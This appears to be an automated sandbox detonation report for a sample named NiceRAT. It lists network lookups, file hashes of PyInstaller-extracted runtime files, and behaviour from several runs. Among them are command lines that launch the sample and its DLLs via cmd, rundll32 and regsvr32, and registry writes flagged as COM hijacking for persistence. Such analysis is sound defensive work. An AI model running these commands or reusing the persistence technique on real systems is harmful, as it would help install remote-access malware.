US 8.8.8.8:53 187.77.117.104.in-addr.arpa udp
US 8.8.8.8:53 43.58.199.20.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
US 8.8.8.8:53 10.28.171.150.in-addr.arpa udp

Files

All files below sit in C:\Users\Admin\AppData\Local\Temp\_MEI49362, the directory the PyInstaller one-file bootloader extracts into: the CPython 3.11 runtime (python311.dll, python3.DLL, base_library.zip), its extension modules (.pyd), the OpenSSL 3 and SQLite libraries, the Visual C++ runtime (VCRUNTIME140*.dll) and the Universal CRT API-set forwarders (api-ms-win-*). Hashes are as reported.

C:\Users\Admin\AppData\Local\Temp\_MEI49362\ucrtbase.dll

MD5 298e85be72551d0cdd9ed650587cfdc6
SHA1 5a82bcc324fb28a5147b4e879b937fb8a56b760c
SHA256 eb89af5911a60d892a685181c397d32b72c61dc2ad77dd45b8cac0fbb7602b84
SHA512 3fafea5ff0d0b4e07f6354c37b367ada4da1b607186690c732364518a93c3fd2f5004014c9c3d23dde28db87d1cb9ae1259cda68b9ba757db59a59d387ac4e02

C:\Users\Admin\AppData\Local\Temp\_MEI49362\python311.dll

MD5 65e381a0b1bc05f71c139b0c7a5b8eb2
SHA1 7c4a3adf21ebcee5405288fc81fc4be75019d472
SHA256 53a969094231b9032abe4148939ce08a3a4e4b30b0459fc7d90c89f65e8dcd4a
SHA512 4db465ef927dfb019ab6faec3a3538b0c3a8693ea3c2148fd16163bf31c03c899dfdf350c31457edf64e671e3cc3e46851f32f0f84b267535bebc4768ef53d39

C:\Users\Admin\AppData\Local\Temp\_MEI49362\VCRUNTIME140.dll

MD5 4585a96cc4eef6aafd5e27ea09147dc6
SHA1 489cfff1b19abbec98fda26ac8958005e88dd0cb
SHA256 a8f950b4357ec12cfccddc9094cca56a3d5244b95e09ea6e9a746489f2d58736
SHA512 d78260c66331fe3029d2cc1b41a5d002ec651f2e3bbf55076d65839b5e3c6297955afd4d9ab8951fbdc9f929dbc65eb18b14b59bce1f2994318564eb4920f286

C:\Users\Admin\AppData\Local\Temp\_MEI49362\base_library.zip

MD5 d220b7e359810266fe6885a169448fa0
SHA1 556728b326318b992b0def059eca239eb14ba198
SHA256 ca40732f885379489d75a2dec8eb68a7cce024f7302dd86d63f075e2745a1e7d
SHA512 8f802c2e717b0cb47c3eeea990ffa0214f17d00c79ce65a0c0824a4f095bde9a3d9d85efb38f8f2535e703476cb6f379195565761a0b1d738d045d7bb2c0b542

C:\Users\Admin\AppData\Local\Temp\_MEI49362\_ctypes.pyd

MD5 22c4892caf560a3ee28cf7f210711f9e
SHA1 b30520fadd882b667ecef3b4e5c05dc92e08b95a
SHA256 e28d4e46e5d10b5fdcf0292f91e8fd767e33473116247cd5d577e4554d7a4c0c
SHA512 edb86b3694fff0b05318decf7fc42c20c348c1523892cce7b89cc9c5ab62925261d4dd72d9f46c9b2bda5ac1e6b53060b8701318b064a286e84f817813960b19

C:\Users\Admin\AppData\Local\Temp\_MEI49362\python3.DLL

MD5 d8ba00c1d9fcc7c0abbffb5c214da647
SHA1 5fa9d5700b42a83bfcc125d1c45e0111b9d62035
SHA256 e45452efa356db874f2e5ff08c9cc0fe22528609e5d341f8fb67ba48885ab77d
SHA512 df1b714494856f618a742791eefbf470b2eee07b51d983256e4386ea7d48da5c7b1e896f222ea55a748c9413203886cde3a65ef9e7ea069014fa626f81d79cd3

C:\Users\Admin\AppData\Local\Temp\_MEI49362\libffi-8.dll

MD5 0f8e4992ca92baaf54cc0b43aaccce21
SHA1 c7300975df267b1d6adcbac0ac93fd7b1ab49bd2
SHA256 eff52743773eb550fcc6ce3efc37c85724502233b6b002a35496d828bd7b280a
SHA512 6e1b223462dc124279bfca74fd2c66fe18b368ffbca540c84e82e0f5bcbea0e10cc243975574fa95ace437b9d8b03a446ed5ee0c9b1b094147cefaf704dfe978

C:\Users\Admin\AppData\Local\Temp\_MEI49362\_bz2.pyd

MD5 28ede9ce9484f078ac4e52592a8704c7
SHA1 bcf8d6fe9f42a68563b6ce964bdc615c119992d0
SHA256 403e76fe18515a5ea3227cf5f919aa2f32ac3233853c9fb71627f2251c554d09
SHA512 8c372f9f6c4d27f7ca9028c6034c17deb6e98cfef690733465c1b44bd212f363625d9c768f8e0bd4c781ddde34ee4316256203ed18fa709d120f56df3cca108b

C:\Users\Admin\AppData\Local\Temp\_MEI49362\_lzma.pyd

MD5 d386b7c4dcf589e026abfc7196cf1c4c
SHA1 c07ce47ce0e69d233c5bdd0bcac507057d04b2d4
SHA256 ad0440ca6998e18f5cc917d088af3fea2c0ff0febce2b5e2b6c0f1370f6e87b1
SHA512 78d79e2379761b054df1f9fd8c5b7de5c16b99af2d2de16a3d0ac5cb3f0bd522257579a49e91218b972a273db4981f046609fdcf2f31cf074724d544dac7d6c8

C:\Users\Admin\AppData\Local\Temp\_MEI49362\api-ms-win-core-processthreads-l1-1-0.dll

MD5 d5fc4afae80dc3abf97b716416bc2952
SHA1 cd0fd43345393b633c315b489ee85fd846597ce6
SHA256 a1a413de3c85658d1672aa4c6aa77056e1a4884ab9ed5bb572cad991c9b348db
SHA512 d5fe2058bf212136248afe0675477ec03defab7db7e08667f9cf1fd9c1fb87d639a3af049639f7d1bfa136728d3ea420d85bcd20f8f3a39dda95cf69098d0bf2

C:\Users\Admin\AppData\Local\Temp\_MEI49362\VCRUNTIME140_1.dll

MD5 7e668ab8a78bd0118b94978d154c85bc
SHA1 dbac42a02a8d50639805174afd21d45f3c56e3a0
SHA256 e4b533a94e02c574780e4b333fcf0889f65ed00d39e32c0fbbda2116f185873f
SHA512 72bb41db17256141b06e2eaeb8fc65ad4abdb65e4b5f604c82b9e7e7f60050734137d602e0f853f1a38201515655b6982f2761ee0fa77c531aa58591c95f0032

C:\Users\Admin\AppData\Local\Temp\_MEI49362\unicodedata.pyd

MD5 57f8f40cf955561a5044ddffa4f2e144
SHA1 19218025bcae076529e49dde8c74f12e1b779279
SHA256 1a965c1904da88989468852fdc749b520cce46617b9190163c8df19345b59560
SHA512 db2a7a32e0b5bf0684a8c4d57a1d7df411d8eb1bc3828f44c95235dd3af40e50a198427350161dff2e79c07a82ef98e1536e0e013030a15bdf1116154f1d8338

C:\Users\Admin\AppData\Local\Temp\_MEI49362\sqlite3.dll

MD5 256224cc25d085663d4954be6cc8c5b5
SHA1 9931cc156642e2259dfabf0154fddf50d86e9334
SHA256 5ac6ee18cdca84c078b66055f5e9ffc6f8502e22eaf0fa54aeec92b75a3c463e
SHA512 a28abf03199f0ce9f044329f7eba2f1d8ecbc43674337aafbf173f567158ba9046036da91dc3e12c2bb1d7842953526edba14bc03f81ece63dcedcc9413213a7

C:\Users\Admin\AppData\Local\Temp\_MEI49362\select.pyd

MD5 8472d39b9ee6051c961021d664c7447e
SHA1 b284e3566889359576d43e2e0e99d4acf068e4fb
SHA256 8a9a103bc417dede9f6946d9033487c410937e1761d93c358c1600b82f0a711f
SHA512 309f1ec491d9c39f4b319e7ce1abdedf11924301e4582d122e261e948705fb71a453fec34f63df9f9abe7f8cc2063a56cd2c2935418ab54be5596aadc2e90ad3

C:\Users\Admin\AppData\Local\Temp\_MEI49362\pyexpat.pyd

MD5 6527063f18e8d49d04e2cc216c2f0b27
SHA1 917c349c62689f9b782a314ce4b2311b6b826606
SHA256 5604f629523125904909547a97f3cdb5dbfe33b39878bad77534de0c3c034387
SHA512 67c87d11683a0f4e1bc4083ff05edee423155f829051c3fa66cc4f2cfb98cf7374b3a06eb37095e19f5f2a6c8da83f0c0e3f7eb964694992b525f81b1b00f423

C:\Users\Admin\AppData\Local\Temp\_MEI49362\libssl-3.dll

MD5 bfc834bb2310ddf01be9ad9cff7c2a41
SHA1 fb1d601b4fcb29ff1b13b0d2ed7119bd0472205c
SHA256 41ad1a04ca27a7959579e87fbbda87c93099616a64a0e66260c983381c5570d1
SHA512 6af473c7c0997f2847ebe7cee8ef67cd682dee41720d4f268964330b449ba71398fda8954524f9a97cc4cdf9893b8bdc7a1cf40e9e45a73f4f35a37f31c6a9c3

C:\Users\Admin\AppData\Local\Temp\_MEI49362\libcrypto-3.dll

MD5 51e8a5281c2092e45d8c97fbdbf39560
SHA1 c499c810ed83aaadce3b267807e593ec6b121211
SHA256 2a234b5aa20c3faecf725bbb54fb33f3d94543f78fa7045408e905593e49960a
SHA512 98b91719b0975cb38d3b3c7b6f820d184ef1b64d38ad8515be0b8b07730e2272376b9e51631fe9efd9b8a1709fea214cf3f77b34eeb9fd282eb09e395120e7cb

C:\Users\Admin\AppData\Local\Temp\_MEI49362\api-ms-win-crt-utility-l1-1-0.dll

MD5 9b622ca5388b6400705c8f21550bae8e
SHA1 eb599555448bf98cdeabc2f8b10cfe9bd2181d9f
SHA256 af1e1b84f066ba05da20847bffd874d80a810b5407f8c6647b3ff9e8f7d37863
SHA512 9872f54ac744cf537826277f1c0a3fd00c5aa51f353692c1929be7bc2e3836e1a52cab2c467ba675d4052ac3116f5622755c3db8be389c179f7d460391105545

C:\Users\Admin\AppData\Local\Temp\_MEI49362\api-ms-win-crt-time-l1-1-0.dll

MD5 0d9afb006f46478008c180b9da5465ac
SHA1 3be2f543bbc8d9f1639d0ed798c5856359a9f29b
SHA256 c3a70153e1d0ecd1cbf95de033bfef5cfecabe7a8274cafe272cc2c14865cd8c
SHA512 4bd76efcb2432994d10884c302aee6cadbc2d594bbbd4e654c1e8547a1efd76fd92e4879b8120dfacb5e8a77826009f72faa5727b1aa559ed3fc86d0ce3ed029

C:\Users\Admin\AppData\Local\Temp\_MEI49362\api-ms-win-crt-string-l1-1-0.dll

MD5 aacade02d7aaf6b5eff26a0e3a11c42d
SHA1 93b8077b535b38fdb0b7c020d24ba280adbe80c3
SHA256 e71d517e6b7039437e3fc449d8ad12eeeca0d5c8ed1c500555344fd90ddc3207
SHA512 e02fcbcb70100f67e65903d8b1a7e6314cabfb0b14797bd6e1c92b7bcb3994a54133e35d16da0a29576145b2783221330591526f856b79a25c0575fc923985a6

C:\Users\Admin\AppData\Local\Temp\_MEI49362\api-ms-win-crt-stdio-l1-1-0.dll

MD5 5df2410c0afd30c9a11de50de4798089
SHA1 4112c5493009a1d01090ccae810500c765dc6d54
SHA256 e6a1ef1f7c1957c50a3d9c1d70c0f7b0d8badc7f279cd056eb179dc256bfefda
SHA512 8ecb79078d05d5b2a432f511953985b3253d5d43d87709a5795709ee8dbca63c5f1166ed94d8984c13f2ea06adfa7d6b82c6735c23c6e64f2f37a257066864e6

C:\Users\Admin\AppData\Local\Temp\_MEI49362\api-ms-win-crt-runtime-l1-1-0.dll

MD5 dbd23405e7baa8e1ac763fa506021122
SHA1 c50ae9cc82c842d50c4317034792d034ac7eb5be
SHA256 57fe2bab2acb1184a468e45cebe7609a2986d5220bb2d82592b9ca6e22384f89
SHA512 dafea32e44224b40dcc9ca96fd977a7c14128ca1dd0a6144844537d52ba25bcec83c2fa94a665a7497be9e079e7fc71298b950e3a8a0c03c4a5c8172f11063b9

C:\Users\Admin\AppData\Local\Temp\_MEI49362\api-ms-win-crt-process-l1-1-0.dll

MD5 d8a5c1960281ec59fd4164c983516d7c
SHA1 29e6feff9fb16b9d8271b7da6925baf3c6339d06
SHA256 12bb3f480ec115d5f9447414525c5dcd236ed48356d5a70650541c9499bc4d19
SHA512 c97aa4029bcd8ffc490547dd78582ac81049dded2288102b800287a7fb623d9fde327702f8a24dfe2d2d67b2c9aaf97050756474faa4914ca4cb6038449c64bf

C:\Users\Admin\AppData\Local\Temp\_MEI49362\api-ms-win-crt-multibyte-l1-1-0.dll

MD5 0d19e7c415f72971239ca241fd960810
SHA1 682869cf2eb6f998d5ab50cc892383c9073e4646
SHA256 d0e566797a5861a745a8f46e1f79ff56185f7c64ce10623dad4700f8e410d94f
SHA512 f03a27e5d8c2c833df0b3e7531fd95cef507acd82dd72078377a7d54e2acd0284276b1f1f7406b2045899d29a6e04c26e061b37fcb9fc293626515247bd19f2b

C:\Users\Admin\AppData\Local\Temp\_MEI49362\api-ms-win-crt-math-l1-1-0.dll

MD5 c4cac2d609bb5e0da9017ebb535634ce
SHA1 51a264ce4545a2f0d9f2908771e01e001b4e763e
SHA256 7c3336c3a50bf3b4c5492c0d085519c040878243e9f7d3ea9f6a2e35c8f1f374
SHA512 3b55bdbc5132d05ab53852605afe6ed49f4b3decdde8b11f19a621a78a37d98c7aeaaa8c10bf4565b9b50162816305fa5192ee31950a96dc08ae46bfc6af4ffe

C:\Users\Admin\AppData\Local\Temp\_MEI49362\api-ms-win-crt-locale-l1-1-0.dll

MD5 ba17b278fff2c18e34e47562ddde8166
SHA1 bed762d11b98737fcf1d1713d77345ec4780a8c2
SHA256 c36f5c0ac5d91a8417866dd4d8c670c2192ba83364693e7438282fb8678c3d1e
SHA512 72516b81606ccf836549c053325368e93264fdebc7092e42e3df849a16ccefa81b7156ae5609e227faa7c9c1bf9d68b2ac349791a839f4575728f350dd048f27

C:\Users\Admin\AppData\Local\Temp\_MEI49362\api-ms-win-crt-heap-l1-1-0.dll

MD5 a22f9a4cbd701209842b204895fedf37
SHA1 72fa50160baf1f2ea2adcff58f3f90a77a59d949
SHA256 2ee3d52640d84ac4f7f7ddfe748f51baa6fd0d492286c781251222420e85ca97
SHA512 903755d4fa6651669295a10e66be8ea223cd8d5ad60ebe06188d8b779fef7e964d0aa26dc5479f14aab655562d3c1ef76b86790fb97f991eaf52da0f70e40529

Analysis: behavioral9

Detonation Overview

Submitted

2024-06-20 19:27

Reported

2024-06-20 19:32

Platform

win7-20240419-en

Max time kernel

122s

Max time network

123s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\NiceRAT.pyc

Signatures

Enumerates physical storage devices

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000_CLASSES\.pyc C:\Windows\system32\rundll32.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000_CLASSES\.pyc\ = "pyc_auto_file" C:\Windows\system32\rundll32.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000_CLASSES\pyc_auto_file\shell\Read\command\ = "\"C:\\Program Files (x86)\\Adobe\\Reader 9.0\\Reader\\AcroRd32.exe\" \"%1\"" C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000_CLASSES\pyc_auto_file C:\Windows\system32\rundll32.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000_CLASSES\pyc_auto_file\ C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000_CLASSES\pyc_auto_file\shell C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000_CLASSES\pyc_auto_file\shell\Read\command C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000_Classes\Local Settings C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000_CLASSES\pyc_auto_file\shell\Read C:\Windows\system32\rundll32.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe N/A

Processes

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\NiceRAT.pyc

C:\Windows\system32\rundll32.exe

"C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\AppData\Local\Temp\NiceRAT.pyc

C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe

"C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\NiceRAT.pyc"

Network

N/A

Files

C:\Users\Admin\AppData\Roaming\Adobe\Acrobat\9.0\SharedDataEvents

MD5 62eaa26fa564d26370dc0b09a52db318
SHA1 8476c71c61ae78e5ae510f1d4acab9056c8b939a
SHA256 4bac2752966da51267defa795b2647b715bf24856333158d5769196575999ce6
SHA512 34dc24cad6838f5d77784c1cacfbfac086bc8954791aa37383638629856e82c0c587f840feafcdaeb7037df27cfbfc07d6f328afde77ff69c2dd9aa8e094362d

Analysis: behavioral10

Detonation Overview

Submitted

2024-06-20 19:27

Reported

2024-06-20 19:33

Platform

win10v2004-20240611-en

Max time kernel

299s

Max time network

303s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\NiceRAT.pyc

Signatures

Enumerates physical storage devices

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings C:\Windows\system32\cmd.exe N/A
Key created \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings C:\Windows\system32\OpenWith.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\system32\OpenWith.exe N/A

Processes

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\NiceRAT.pyc

C:\Windows\system32\OpenWith.exe

C:\Windows\system32\OpenWith.exe -Embedding

Network

Country Destination Domain Proto
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 69.31.126.40.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
NL 23.62.61.97:443 www.bing.com tcp
NL 23.62.61.97:443 www.bing.com tcp
US 8.8.8.8:53 97.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 57.15.31.184.in-addr.arpa udp
US 8.8.8.8:53 186.77.117.104.in-addr.arpa udp
US 8.8.8.8:53 43.58.199.20.in-addr.arpa udp
US 8.8.8.8:53 29.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 205.47.74.20.in-addr.arpa udp
US 8.8.8.8:53 10.28.171.150.in-addr.arpa udp

Files

N/A

Analysis: behavioral11

Detonation Overview

Submitted

2024-06-20 19:27

Reported

2024-06-20 19:33

Platform

win7-20240508-en

Max time kernel

118s

Max time network

123s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\libEGL.dll,#1

Signatures

N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\libEGL.dll,#1

Network

N/A

Files

N/A

Analysis: behavioral13

Detonation Overview

Submitted

2024-06-20 19:27

Reported

2024-06-20 19:33

Platform

win7-20240611-en

Max time kernel

119s

Max time network

121s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\libGLESv2.dll,#1

Signatures

N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\libGLESv2.dll,#1

Network

N/A

Files

N/A

Analysis: behavioral3

Detonation Overview

Submitted

2024-06-20 19:27

Reported

2024-06-20 19:33

Platform

win7-20240611-en

Max time kernel

121s

Max time network

123s

Command Line

regsvr32 /s C:\Users\Admin\AppData\Local\Temp\MapiProxy.dll

Signatures

Event Triggered Execution: Component Object Model Hijacking

persistence privilege_escalation

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-1340930862-1405011213-2821322012-1000_CLASSES\CLSID C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6EDCD38E-8861-11D5-A3DD-00B0D0F3BAA7}\InProcServer32 C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6EDCD38E-8861-11D5-A3DD-00B0D0F3BAA7}\InProcServer32\ThreadingModel = "Both" C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{6EDCD38E-8861-11D5-A3DD-00B0D0F3BAA7}\ProxyStubClsid32\ = "{6EDCD38E-8861-11D5-A3DD-00B0D0F3BAA7}" C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{6EDCD38E-8861-11D5-A3DD-00B0D0F3BAA7}\ProxyStubClsid32 C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{6EDCD38E-8861-11D5-A3DD-00B0D0F3BAA7}\ = "nsIMapi" C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{6EDCD38E-8861-11D5-A3DD-00B0D0F3BAA7}\NumMethods\ = "16" C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6EDCD38E-8861-11D5-A3DD-00B0D0F3BAA7}\ = "PSFactoryBuffer" C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{6EDCD38E-8861-11D5-A3DD-00B0D0F3BAA7} C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6EDCD38E-8861-11D5-A3DD-00B0D0F3BAA7} C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6EDCD38E-8861-11D5-A3DD-00B0D0F3BAA7}\InProcServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\MapiProxy.dll" C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{6EDCD38E-8861-11D5-A3DD-00B0D0F3BAA7}\NumMethods C:\Windows\system32\regsvr32.exe N/A

Processes

C:\Windows\system32\regsvr32.exe

regsvr32 /s C:\Users\Admin\AppData\Local\Temp\MapiProxy.dll

Network

N/A

Files

N/A

Analysis: behavioral4

Detonation Overview

Submitted

2024-06-20 19:27

Reported

2024-06-20 19:33

Platform

win10v2004-20240508-en

Max time kernel

78s

Max time network

99s

Command Line

regsvr32 /s C:\Users\Admin\AppData\Local\Temp\MapiProxy.dll

Signatures

Event Triggered Execution: Component Object Model Hijacking

persistence privilege_escalation

Modifies registry class

Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6EDCD38E-8861-11D5-A3DD-00B0D0F3BAA7}\InProcServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\MapiProxy.dll" C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6EDCD38E-8861-11D5-A3DD-00B0D0F3BAA7}\ = "PSFactoryBuffer" C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\CLSID C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6EDCD38E-8861-11D5-A3DD-00B0D0F3BAA7}\InProcServer32 C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Interface C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{6EDCD38E-8861-11D5-A3DD-00B0D0F3BAA7}\ = "nsIMapi" C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{6EDCD38E-8861-11D5-A3DD-00B0D0F3BAA7}\NumMethods C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{6EDCD38E-8861-11D5-A3DD-00B0D0F3BAA7}\ProxyStubClsid32 C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{6EDCD38E-8861-11D5-A3DD-00B0D0F3BAA7}\NumMethods\ = "16" C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6EDCD38E-8861-11D5-A3DD-00B0D0F3BAA7} C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6EDCD38E-8861-11D5-A3DD-00B0D0F3BAA7}\InProcServer32\ThreadingModel = "Both" C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{6EDCD38E-8861-11D5-A3DD-00B0D0F3BAA7} C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{6EDCD38E-8861-11D5-A3DD-00B0D0F3BAA7}\ProxyStubClsid32\ = "{6EDCD38E-8861-11D5-A3DD-00B0D0F3BAA7}" C:\Windows\system32\regsvr32.exe N/A

Processes

C:\Windows\system32\regsvr32.exe

regsvr32 /s C:\Users\Admin\AppData\Local\Temp\MapiProxy.dll

Network

Country Destination Domain Proto
US 52.111.227.14:443 tcp

Files

N/A

Analysis: behavioral16

Detonation Overview

Submitted

2024-06-20 19:27

Reported

2024-06-20 19:33

Platform

win10v2004-20240508-en

Max time kernel

261s

Max time network

271s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\libotr.dll,#1

Signatures

N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\libotr.dll,#1

Network

Files

N/A

Analysis: behavioral17

Detonation Overview

Submitted

2024-06-20 19:27

Reported

2024-06-20 19:33

Platform

win7-20240508-en

Max time kernel

292s

Max time network

120s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\libssp-0.dll,#1

Signatures

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2556 wrote to memory of 2828 N/A C:\Windows\system32\rundll32.exe C:\Windows\system32\WerFault.exe
PID 2556 wrote to memory of 2828 N/A C:\Windows\system32\rundll32.exe C:\Windows\system32\WerFault.exe
PID 2556 wrote to memory of 2828 N/A C:\Windows\system32\rundll32.exe C:\Windows\system32\WerFault.exe

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\libssp-0.dll,#1

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -u -p 2556 -s 92

Network

N/A

Files

memory/2556-0-0x0000000068AC0000-0x0000000068AE6000-memory.dmp

Analysis: behavioral12

Detonation Overview

Submitted

2024-06-20 19:27

Reported

2024-06-20 19:33

Platform

win10v2004-20240508-en

Max time kernel

248s

Max time network

263s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\libEGL.dll,#1

Signatures

N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\libEGL.dll,#1

Network

Country Destination Domain Proto
NL 52.142.223.178:80 tcp

Files

N/A

Analysis: behavioral15

Detonation Overview

Submitted

2024-06-20 19:27

Reported

2024-06-20 19:33

Platform

win7-20240221-en

Max time kernel

121s

Max time network

127s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\libotr.dll,#1

Signatures

N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\libotr.dll,#1

Network

N/A

Files

N/A

Analysis: behavioral5

Detonation Overview

Submitted

2024-06-20 19:27

Reported

2024-06-20 19:33

Platform

win7-20240419-en

Max time kernel

118s

Max time network

121s

Command Line

regsvr32 /s C:\Users\Admin\AppData\Local\Temp\MapiProxy_InUse.dll

Signatures

Event Triggered Execution: Component Object Model Hijacking

persistence privilege_escalation

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6EDCD38E-8861-11D5-A3DD-00B0D0F3BAA7}\InProcServer32 C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{6EDCD38E-8861-11D5-A3DD-00B0D0F3BAA7}\ = "nsIMapi" C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000_CLASSES\CLSID C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6EDCD38E-8861-11D5-A3DD-00B0D0F3BAA7} C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{6EDCD38E-8861-11D5-A3DD-00B0D0F3BAA7}\ProxyStubClsid32 C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{6EDCD38E-8861-11D5-A3DD-00B0D0F3BAA7}\ProxyStubClsid32\ = "{6EDCD38E-8861-11D5-A3DD-00B0D0F3BAA7}" C:\Windows\system32\regsvr32.exe N/A
